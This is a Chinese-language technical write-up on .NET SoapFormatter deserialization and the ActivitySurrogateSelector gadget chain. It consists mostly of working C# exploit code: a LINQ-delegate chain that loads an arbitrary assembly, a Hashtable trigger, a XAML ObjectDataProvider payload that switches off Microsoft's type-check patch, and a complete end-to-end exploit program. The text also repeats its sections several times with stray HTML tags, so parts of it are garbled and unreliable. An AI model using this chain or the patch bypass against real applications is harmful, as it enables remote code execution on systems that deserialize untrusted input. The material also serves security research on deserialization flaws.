SoapFormatter 反序列化与ActivitySurrogateSelector Gadgets 技术分析<\/h1>

1. SoapFormatter 概述<\/h2>
SoapFormatter 是 .NET 框架中用于生成基于 XML 的 SOAP 数据流的类，位于 `System.Runtime.Serialization.Formatters.Soap<\/code> 命名空间。它实现了 IRemotingFormatter<\/code> 和 IFormatter<\/code> 接口。<\/p>`

基本用法示例<\/h3>
using<\/span> System;
<\/span><\/span>using<\/span> System.IO;
<\/span><\/span>using<\/span> System.Runtime.Serialization.Formatters.Soap;
<\/span><\/span>using<\/span> System.Text;
<\/span><\/span>
<\/span><\/span>namespace<\/span> SoapDeserializationTest
<\/span><\/span>{
<\/span><\/span>    [Serializable]<\/span>
<\/span><\/span>    public<\/span> class<\/span> Person<\/span>
<\/span><\/span>    {
<\/span><\/span>        public<\/span> string<\/span> Name { get<\/span>; set<\/span>; }
<\/span><\/span>        public<\/span> string<\/span> FirstName { get<\/span>; set<\/span>; }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    internal<\/span> class<\/span> Program<\/span>
<\/span><\/span>    {
<\/span><\/span>        static<\/span> void<\/span> Main(string<\/span>[] args)
<\/span><\/span>        {
<\/span><\/span>            Person person = new<\/span> Person();
<\/span><\/span>            person.Name = "guess"<\/span>;
<\/span><\/span>            person.FirstName = "EX"<\/span>;
<\/span><\/span>
<\/span><\/span>            SoapFormatter soapFormatter = new<\/span> SoapFormatter();
<\/span><\/span>            using<\/span> (var<\/span> memoryStream = new<\/span> MemoryStream())
<\/span><\/span>            {
<\/span><\/span>                soapFormatter.Serialize(memoryStream, person);
<\/span><\/span>                memoryStream.Position = 0<\/span>;
<\/span><\/span>                string<\/span> soap = Encoding.UTF8.GetString(memoryStream.ToArray());
<\/span><\/span>                Console.WriteLine(Encoding.Default.GetString(memoryStream.ToArray()));
<\/span><\/span>            }
<\/span><\/span>            Console.ReadLine();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. SerializationSurrogate 机制<\/h2>
SerializationSurrogate<\/code>（序列化代理）允许不可序列化的类通过代理进行序列化和反序列化操作。实现 ISerializationSurrogate<\/code> 接口需要实现 SetObjectData<\/code> 和 GetObjectData<\/code> 方法。<\/p>
示例实现<\/h3>
using<\/span> System;
<\/span><\/span>using<\/span> System.IO;
<\/span><\/span>using<\/span> System.Runtime.Serialization;
<\/span><\/span>using<\/span> System.Runtime.Serialization.Formatters.Soap;
<\/span><\/span>
<\/span><\/span>namespace<\/span> SoapDeserializationTest
<\/span><\/span>{
<\/span><\/span>    public<\/span> class<\/span> Person<\/span>
<\/span><\/span>    {
<\/span><\/span>        public<\/span> string<\/span> Name { get<\/span>; set<\/span>; }
<\/span><\/span>        public<\/span> string<\/span> FirstName { get<\/span>; set<\/span>; }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    public<\/span> class<\/span> PersonSurrogateSelector<\/span> : ISerializationSurrogate
<\/span><\/span>    {
<\/span><\/span>        public<\/span> void<\/span> GetObjectData(object<\/span> obj, SerializationInfo info, StreamingContext context)
<\/span><\/span>        {
<\/span><\/span>            Person person = (Person)obj;
<\/span><\/span>            info.AddValue("PersonName"<\/span>, person.Name);
<\/span><\/span>        }
<\/span><\/span>
<\/span><\/span>        public<\/span> object<\/span> SetObjectData(object<\/span> obj, SerializationInfo info, StreamingContext context, ISurrogateSelector selector)
<\/span><\/span>        {
<\/span><\/span>            Person person = (Person)obj;
<\/span><\/span>            person.Name = info.GetString("PersonName"<\/span>);
<\/span><\/span>            return<\/span> person;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    internal<\/span> class<\/span> Program<\/span>
<\/span><\/span>    {
<\/span><\/span>        static<\/span> void<\/span> Main(string<\/span>[] args)
<\/span><\/span>        {
<\/span><\/span>            Person person = new<\/span> Person();
<\/span><\/span>            person.Name = "guess"<\/span>;
<\/span><\/span>            person.FirstName = "EX"<\/span>;
<\/span><\/span>
<\/span><\/span>            SoapFormatter soapFormatter = new<\/span> SoapFormatter();
<\/span><\/span>            PersonSurrogateSelector personSurrogateSelector = new<\/span> PersonSurrogateSelector();
<\/span><\/span>            SurrogateSelector surrogateSelector = new<\/span> SurrogateSelector();
<\/span><\/span>            surrogateSelector.AddSurrogate(typeof<\/span>(Person), new<\/span> StreamingContext(StreamingContextStates.All), personSurrogateSelector);
<\/span><\/span>            soapFormatter.SurrogateSelector = surrogateSelector;
<\/span><\/span>
<\/span><\/span>            using<\/span> (var<\/span> memoryStream = new<\/span> MemoryStream())
<\/span><\/span>            {
<\/span><\/span>                soapFormatter.Serialize(memoryStream, person);
<\/span><\/span>                memoryStream.Position = 0<\/span>;
<\/span><\/span>                string<\/span> soap = Encoding.UTF8.GetString(memoryStream.ToArray());
<\/span><\/span>                Console.WriteLine(Encoding.Default.GetString(memoryStream.ToArray()));
<\/span><\/span>                soapFormatter.Deserialize(memoryStream);
<\/span><\/span>            }
<\/span><\/span>            Console.ReadLine();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. SurrogateSelector 工作原理<\/h2>
SurrogateSelector<\/code> 是代理选择器，位于 System.Runtime.Serialization<\/code> 命名空间，允许序列化和反序列化原本不能被序列化的类。<\/p>
自定义 SurrogateSelector 示例<\/h3>
class<\/span> MySurrogateSelector<\/span> : SurrogateSelector
<\/span><\/span>{
<\/span><\/span>    public<\/span> override<\/span> ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out<\/span> ISurrogateSelector selector)
<\/span><\/span>    {
<\/span><\/span>        selector = this<\/span>;
<\/span><\/span>        if<\/span> (!type.IsSerializable)
<\/span><\/span>        {
<\/span><\/span>            Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"<\/span>);
<\/span><\/span>            return<\/span> (ISerializationSurrogate)Activator.CreateInstance(t);
<\/span><\/span>        }
<\/span><\/span>        return<\/span> base<\/span>.GetSurrogate(type, context, out<\/span> selector);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. ActivitySurrogateSelector 利用<\/h2>
ActivitySurrogateSelector<\/code> 位于 System.Workflow.ComponentModel.Serialization<\/code> 命名空间，可用于序列化 Activity 的代理。<\/p>
关键利用代码<\/h3>
System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck"<\/span>, "true"<\/span>);
<\/span><\/span>SoapFormatter soapFormatter1 = new<\/span> SoapFormatter();
<\/span><\/span>MemoryStream memoryStream = new<\/span> MemoryStream();
<\/span><\/span>
<\/span><\/span>soapFormatter1.SurrogateSelector = new<\/span> MySurrogateSelector();
<\/span><\/span>soapFormatter1.Serialize(memoryStream, new<\/span> NonSerializable("Hello World!"<\/span>));
<\/span><\/span>memoryStream.Position = 0<\/span>;
<\/span><\/span>
<\/span><\/span>SoapFormatter soapFormatter2 = new<\/span> SoapFormatter();
<\/span><\/span>Console.WriteLine(soapFormatter2.Deserialize(memoryStream));
<\/span><\/span><\/code><\/pre>ActivitySurrogateSelector.ObjectSurrogate 关键方法<\/h3>
public<\/span> void<\/span> GetObjectData(object<\/span> obj, SerializationInfo info, StreamingContext context)
<\/span><\/span>{
<\/span><\/span>    if<\/span> (!AppSettings.DisableActivitySurrogateSelectorTypeCheck && !(obj is<\/span> ActivityBind) && !(obj is<\/span> DependencyObject))
<\/span><\/span>    {
<\/span><\/span>        throw<\/span> new<\/span> ArgumentException("obj"<\/span>);
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    info.AddValue("type"<\/span>, obj.GetType());
<\/span><\/span>    string<\/span>[] names = null<\/span>;
<\/span><\/span>    MemberInfo[] serializableMembers = FormatterServicesNoSerializableCheck.GetSerializableMembers(obj.GetType(), out<\/span> names);
<\/span><\/span>    object<\/span>[] objectData = FormatterServices.GetObjectData(obj, serializableMembers);
<\/span><\/span>    info.AddValue("memberDatas"<\/span>, objectData);
<\/span><\/span>    info.SetType(typeof<\/span>(ObjectSerializedRef));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. LINQ 与委托结合利用<\/h2>
利用 LINQ 的延迟执行特性和委托机制构造执行链：<\/p>
List<byte<\/span>[]> bytesFile = new<\/span> List<byte<\/span>[]>();
<\/span><\/span>bytesFile.Add(File.ReadAllBytes(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ExploitClass.dll"<\/span>));
<\/span><\/span>
<\/span><\/span>var<\/span> e1 = bytesFile.Select(Assembly.Load);
<\/span><\/span>Func<Assembly, IEnumerable<Type>> MyGetTypes = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(
<\/span><\/span>    typeof<\/span>(Func<Assembly, IEnumerable<Type>>), 
<\/span><\/span>    typeof<\/span>(Assembly).GetMethod("GetTypes"<\/span>));
<\/span><\/span>var<\/span> e2 = e1.SelectMany(MyGetTypes);
<\/span><\/span>var<\/span> e3 = e2.Select(Activator.CreateInstance);
<\/span><\/span><\/code><\/pre>6. 完整利用链构造<\/h2>
执行链转换<\/h3>
\/\/ PagedDataSource 将 IEnumerable 转换为 ICollection<\/span>
<\/span><\/span>PagedDataSource pds = new<\/span> PagedDataSource() { DataSource = e3 };
<\/span><\/span>
<\/span><\/span>\/\/ AggregateDictionary 将 ICollection 转换为 IDictionary<\/span>
<\/span><\/span>IDictionary dict = (IDictionary)Activator.CreateInstance(
<\/span><\/span>    typeof<\/span>(int<\/span>).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"<\/span>), 
<\/span><\/span>    pds);
<\/span><\/span>
<\/span><\/span>\/\/ DesignerVerb 在 ToString 调用时会查询 IDictionary<\/span>
<\/span><\/span>DesignerVerb verb = new<\/span> DesignerVerb("XYZ"<\/span>, null<\/span>);
<\/span><\/span>typeof<\/span>(MenuCommand).GetField("properties"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance)
<\/span><\/span>    .SetValue(verb, dict);
<\/span><\/span><\/code><\/pre>触发机制<\/h3>
通过 Hashtable 的异常处理触发 ToString 调用：<\/p>
Hashtable ht = new<\/span> Hashtable();
<\/span><\/span>ht.Add(verb, "Hello"<\/span>);
<\/span><\/span>ht.Add("Dummy"<\/span>, "Hello2"<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射修改 Hashtable 内部结构<\/span>
<\/span><\/span>FieldInfo fi_keys = ht.GetType().GetField("buckets"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance);
<\/span><\/span>Array keys = (Array)fi_keys.GetValue(ht);
<\/span><\/span>FieldInfo fi_key = keys.GetType().GetElementType().GetField("key"<\/span>, BindingFlags.Public | BindingFlags.Instance);
<\/span><\/span>for<\/span> (int<\/span> i = 0<\/span>; i < keys.Length; ++i)
<\/span><\/span>{
<\/span><\/span>    object<\/span> bucket = keys.GetValue(i);
<\/span><\/span>    object<\/span> key = fi_key.GetValue(bucket);
<\/span><\/span>    if<\/span> (key is<\/span> string<\/span>)
<\/span><\/span>    {
<\/span><\/span>        fi_key.SetValue(bucket, verb);
<\/span><\/span>        keys.SetValue(bucket, i);
<\/span><\/span>        break<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>fi_keys.SetValue(ht, keys);
<\/span><\/span><\/code><\/pre>7. 补丁绕过技术<\/h2>
在 .NET 4.8 之后，微软通过检查 DisableActivitySurrogateSelectorTypeCheck<\/code> 设置来修复漏洞。可以通过 XAML 注入来设置该值：<\/p>
<ResourceDictionary<\/span>
<\/span><\/span>    xmlns=<\/span>"https:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation"<\/span>
<\/span><\/span>    xmlns:x=<\/span>"https:\/\/schemas.microsoft.com\/winfx\/2006\/xaml"<\/span>
<\/span><\/span>    xmlns:s=<\/span>"clr-namespace:System;assembly=mscorlib"<\/span>
<\/span><\/span>    xmlns:c=<\/span>"clr-namespace:System.Configuration;assembly=System.Configuration"<\/span>
<\/span><\/span>    xmlns:r=<\/span>"clr-namespace:System.Reflection;assembly=mscorlib"<\/span>><\/span>
<\/span><\/span>    <ObjectDataProvider<\/span> x:Key=<\/span>"type"<\/span> ObjectType=<\/span>"{x:Type s:Type}"<\/span> MethodName=<\/span>"GetType"<\/span>><\/span>
<\/span><\/span>        <ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>            <s:String><\/span>System.Workflow.ComponentModel.AppSettings, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35<\/s:String><\/span>
<\/span><\/span>        <\/ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>    <\/ObjectDataProvider><\/span>
<\/span><\/span>    <ObjectDataProvider<\/span> x:Key=<\/span>"field"<\/span> ObjectInstance=<\/span>"{StaticResource type}"<\/span> MethodName=<\/span>"GetField"<\/span>><\/span>
<\/span><\/span>        <ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>            <s:String><\/span>disableActivitySurrogateSelectorTypeCheck<\/s:String><\/span>
<\/span><\/span>            <r:BindingFlags><\/span>40<\/r:BindingFlags><\/span>
<\/span><\/span>        <\/ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>    <\/ObjectDataProvider><\/span>
<\/span><\/span>    <ObjectDataProvider<\/span> x:Key=<\/span>"set"<\/span> ObjectInstance=<\/span>"{StaticResource field}"<\/span> MethodName=<\/span>"SetValue"<\/span>><\/span>
<\/span><\/span>        <ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>            <s:Object\/><\/span>
<\/span><\/span>            <s:Boolean><\/span>true<\/s:Boolean><\/span>
<\/span><\/span>        <\/ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>    <\/ObjectDataProvider><\/span>
<\/span><\/span>    <ObjectDataProvider<\/span> x:Key=<\/span>"setMethod"<\/span> ObjectInstance=<\/span>"{x:Static c:ConfigurationManager.AppSettings}"<\/span> MethodName =<\/span>"Set"<\/span>><\/span>
<\/span><\/span>        <ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>            <s:String><\/span>microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck<\/s:String><\/span>
<\/span><\/span>            <s:String><\/span>true<\/s:String><\/span>
<\/span><\/span>        <\/ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>    <\/ObjectDataProvider><\/span>
<\/span><\/span><\/ResourceDictionary><\/span>
<\/span><\/span><\/code><\/pre>8. 完整利用代码示例<\/h2>
using<\/span> System;
<\/span><\/span>using<\/span> System.Collections.Generic;
<\/span><\/span>using<\/span> System.Linq;
<\/span><\/span>using<\/span> System.Runtime.Serialization;
<\/span><\/span>using<\/span> System.Runtime.Serialization.Formatters.Binary;
<\/span><\/span>using<\/span> System.IO;
<\/span><\/span>using<\/span> System.Reflection;
<\/span><\/span>using<\/span> System.Web.UI.WebControls;
<\/span><\/span>using<\/span> System.ComponentModel.Design;
<\/span><\/span>using<\/span> System.Collections;
<\/span><\/span>
<\/span><\/span>namespace<\/span> ActivitySurrogateSelectorGeneratorTest
<\/span><\/span>{
<\/span><\/span>    class<\/span> MySurrogateSelector<\/span> : SurrogateSelector
<\/span><\/span>    {
<\/span><\/span>        public<\/span> override<\/span> ISerializationSurrogate GetSurrogate(Type type,
<\/span><\/span>            StreamingContext context, out<\/span> ISurrogateSelector selector)
<\/span><\/span>        {
<\/span><\/span>            selector = this<\/span>;
<\/span><\/span>            if<\/span> (!type.IsSerializable)
<\/span><\/span>            {
<\/span><\/span>                Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"<\/span>);
<\/span><\/span>                return<\/span> (ISerializationSurrogate)Activator.CreateInstance(t);
<\/span><\/span>            }
<\/span><\/span>            return<\/span> base<\/span>.GetSurrogate(type, context, out<\/span> selector);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span><\/span>    [Serializable]<\/span>
<\/span><\/span>    public<\/span> class<\/span> PayloadClass<\/span> : ISerializable
<\/span><\/span>    {
<\/span><\/span>        public<\/span> byte<\/span>[] GadgetChains()
<\/span><\/span>        {
<\/span><\/span>            List<byte<\/span>[]> bytesFile = new<\/span> List<byte<\/span>[]>();
<\/span><\/span>            bytesFile.Add(File.ReadAllBytes(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ExploitClass.dll"<\/span>));
<\/span><\/span>
<\/span><\/span>            var<\/span> e1 = bytesFile.Select(Assembly.Load);
<\/span><\/span>            Func<Assembly, IEnumerable<Type>> MyGetTypes = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof<\/span>(Func<Assembly, IEnumerable<Type>>), typeof<\/span>(Assembly).GetMethod("GetTypes"<\/span>));
<\/span><\/span>            var<\/span> e2 = e1.SelectMany(MyGetTypes);
<\/span><\/span>            var<\/span> e3 = e2.Select(Activator.CreateInstance);
<\/span><\/span>
<\/span><\/span>            PagedDataSource pds = new<\/span> PagedDataSource() { DataSource = e3 };
<\/span><\/span>            IDictionary dict = (IDictionary)Activator.CreateInstance(typeof<\/span>(int<\/span>).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"<\/span>), pds);
<\/span><\/span>
<\/span><\/span>            DesignerVerb verb = new<\/span> DesignerVerb("XYZ"<\/span>, null<\/span>);
<\/span><\/span>            typeof<\/span>(MenuCommand).GetField("properties"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
<\/span><\/span>
<\/span><\/span>            List<object<\/span>> ls = new<\/span> List<object<\/span>>();
<\/span><\/span>            ls.Add(e1); ls.Add(e2); ls.Add(e3); ls.Add(pds); ls.Add(verb); ls.Add(dict);
<\/span><\/span>
<\/span><\/span>            Hashtable ht = new<\/span> Hashtable();
<\/span><\/span>            ht.Add(verb, "Hello"<\/span>);
<\/span><\/span>            ht.Add("Dummy"<\/span>, "Hello2"<\/span>);
<\/span><\/span>
<\/span><\/span>            FieldInfo fi_keys = ht.GetType().GetField("buckets"<\/span>, BindingFlags.NonPublic | BindingFlags.Instance);
<\/span><\/span>            Array keys = (Array)fi_keys.GetValue(ht);
<\/span><\/span>            FieldInfo fi_key = keys.GetType().GetElementType().GetField("key"<\/span>, BindingFlags.Public | BindingFlags.Instance);
<\/span><\/span>            for<\/span> (int<\/span> i = 0<\/span>; i < keys.Length; ++i)
<\/span><\/span>            {
<\/span><\/span>                object<\/span> bucket = keys.GetValue(i);
<\/span><\/span>                object<\/span> key = fi_key.GetValue(bucket);
<\/span><\/span>                if<\/span> (key is<\/span> string<\/span>)
<\/span><\/span>                {
<\/span><\/span>                    fi_key.SetValue(bucket, verb);
<\/span><\/span>                    keys.SetValue(bucket, i);
<\/span><\/span>                    break<\/span>;
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>            fi_keys.SetValue(ht, keys);
<\/span><\/span>            ls.Add(ht);
<\/span><\/span>
<\/span><\/span>            BinaryFormatter fmt1 = new<\/span> BinaryFormatter();
<\/span><\/span>            MemoryStream stm = new<\/span> MemoryStream();
<\/span><\/span>            fmt1.SurrogateSelector = new<\/span> MySurrogateSelector();
<\/span><\/span>            fmt1.Serialize(stm, ls);
<\/span><\/span>            return<\/span> stm.ToArray();
<\/span><\/span>        }
<\/span><\/span>
<\/span><\/span>        public<\/span> void<\/span> GetObjectData(SerializationInfo info, StreamingContext context)
<\/span><\/span>        {
<\/span><\/span>            info.SetType(typeof<\/span>(System.Windows.Forms.AxHost.State));
<\/span><\/span>            info.AddValue("PropertyBagBinary"<\/span>, GadgetChains());
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    class<\/span> Program<\/span>
<\/span><\/span>    {
<\/span><\/span>        static<\/span> void<\/span> Main(string<\/span>[] args)
<\/span><\/span>        {
<\/span><\/span>            System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck"<\/span>, "true"<\/span>);
<\/span><\/span>            BinaryFormatter fmt1 = new<\/span> BinaryFormatter();
<\/span><\/span>            BinaryFormatter fmt2 = new<\/span> BinaryFormatter();
<\/span><\/span>            MemoryStream stm = new<\/span> MemoryStream();
<\/span><\/span>            PayloadClass test = new<\/span> PayloadClass();
<\/span><\/span>            fmt1.SurrogateSelector = new<\/span> MySurrogateSelector();
<\/span><\/span>            fmt1.Serialize(stm, test);
<\/span><\/span>            stm.Seek(0<\/span>, SeekOrigin.Begin);
<\/span><\/span>            fmt2.Deserialize(stm);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>9. 参考资源<\/h2>

TypeConfuseDelegate - Project Zero<\/a><\/li>
Re-Animating ActivitySurrogateSelector - NetSPI<\/a><\/li>
.NET 反序列化漏洞详解<\/a><\/li>
SoapFormatter 反序列化研究<\/a><\/li>
<\/ol>

SoapFormatter 反序列化与ActivitySurrogateSelector Gadgets 技术分析<\/h1>

1. SoapFormatter 概述<\/h2>
SoapFormatter 是 .NET 框架中用于生成基于 XML 的 SOAP 数据流的类，位于 `System.Runtime.Serialization.Formatters.Soap<\/code> 命名空间。它实现了 IRemotingFormatter<\/code> 和 IFormatter<\/code> 接口。<\/p>`

2. SerializationSurrogate 机制<\/h2>
`SerializationSurrogate<\/code>（序列化代理）允许不可序列化的类通过代理进行序列化和反序列化操作。实现 ISerializationSurrogate<\/code> 接口需要实现 SetObjectData<\/code> 和 GetObjectData<\/code> 方法。<\/p>`

3. SurrogateSelector 工作原理<\/h2>
`SurrogateSelector<\/code> 是代理选择器，位于 System.Runtime.Serialization<\/code> 命名空间，允许序列化和反序列化原本不能被序列化的类。<\/p>`

4. ActivitySurrogateSelector 利用<\/h2>
`ActivitySurrogateSelector<\/code> 位于 System.Workflow.ComponentModel.Serialization<\/code> 命名空间，可用于序列化 Activity 的代理。<\/p>`

6. 完整利用链构造<\/h2>

9. 参考资源<\/h2>

TypeConfuseDelegate - Project Zero<\/a><\/li>
Re-Animating ActivitySurrogateSelector - NetSPI<\/a><\/li>
.NET 反序列化漏洞详解<\/a><\/li>
SoapFormatter 反序列化研究<\/a><\/li> <\/ol>

SoapFormatter 反序列化与ActivitySurrogateSelector Gadgets 技术分析<\/h1>

1. SoapFormatter 概述<\/h2> SoapFormatter 是 .NET 框架中用于生成基于 XML 的 SOAP 数据流的类，位于 System.Runtime.Serialization.Formatters.Soap<\/code> 命名空间。它实现了 IRemotingFormatter<\/code> 和 IFormatter<\/code> 接口。<\/p>

2. SerializationSurrogate 机制<\/h2> SerializationSurrogate<\/code>（序列化代理）允许不可序列化的类通过代理进行序列化和反序列化操作。实现 ISerializationSurrogate<\/code> 接口需要实现 SetObjectData<\/code> 和 GetObjectData<\/code> 方法。<\/p>

3. SurrogateSelector 工作原理<\/h2> SurrogateSelector<\/code> 是代理选择器，位于 System.Runtime.Serialization<\/code> 命名空间，允许序列化和反序列化原本不能被序列化的类。<\/p>

4. ActivitySurrogateSelector 利用<\/h2> ActivitySurrogateSelector<\/code> 位于 System.Workflow.ComponentModel.Serialization<\/code> 命名空间，可用于序列化 Activity 的代理。<\/p>

6. 完整利用链构造<\/h2>

9. 参考资源<\/h2> TypeConfuseDelegate - Project Zero<\/a><\/li> Re-Animating ActivitySurrogateSelector - NetSPI<\/a><\/li> .NET 反序列化漏洞详解<\/a><\/li> SoapFormatter 反序列化研究<\/a><\/li> <\/ol>

1. SoapFormatter 概述<\/h2>
SoapFormatter 是 .NET 框架中用于生成基于 XML 的 SOAP 数据流的类，位于 `System.Runtime.Serialization.Formatters.Soap<\/code> 命名空间。它实现了 IRemotingFormatter<\/code> 和 IFormatter<\/code> 接口。<\/p>`

2. SerializationSurrogate 机制<\/h2>
`SerializationSurrogate<\/code>（序列化代理）允许不可序列化的类通过代理进行序列化和反序列化操作。实现 ISerializationSurrogate<\/code> 接口需要实现 SetObjectData<\/code> 和 GetObjectData<\/code> 方法。<\/p>`

3. SurrogateSelector 工作原理<\/h2>
`SurrogateSelector<\/code> 是代理选择器，位于 System.Runtime.Serialization<\/code> 命名空间，允许序列化和反序列化原本不能被序列化的类。<\/p>`

4. ActivitySurrogateSelector 利用<\/h2>
`ActivitySurrogateSelector<\/code> 位于 System.Workflow.ComponentModel.Serialization<\/code> 命名空间，可用于序列化 Activity 的代理。<\/p>`

9. 参考资源<\/h2>

TypeConfuseDelegate - Project Zero<\/a><\/li>
Re-Animating ActivitySurrogateSelector - NetSPI<\/a><\/li>
.NET 反序列化漏洞详解<\/a><\/li>
SoapFormatter 反序列化研究<\/a><\/li> <\/ol>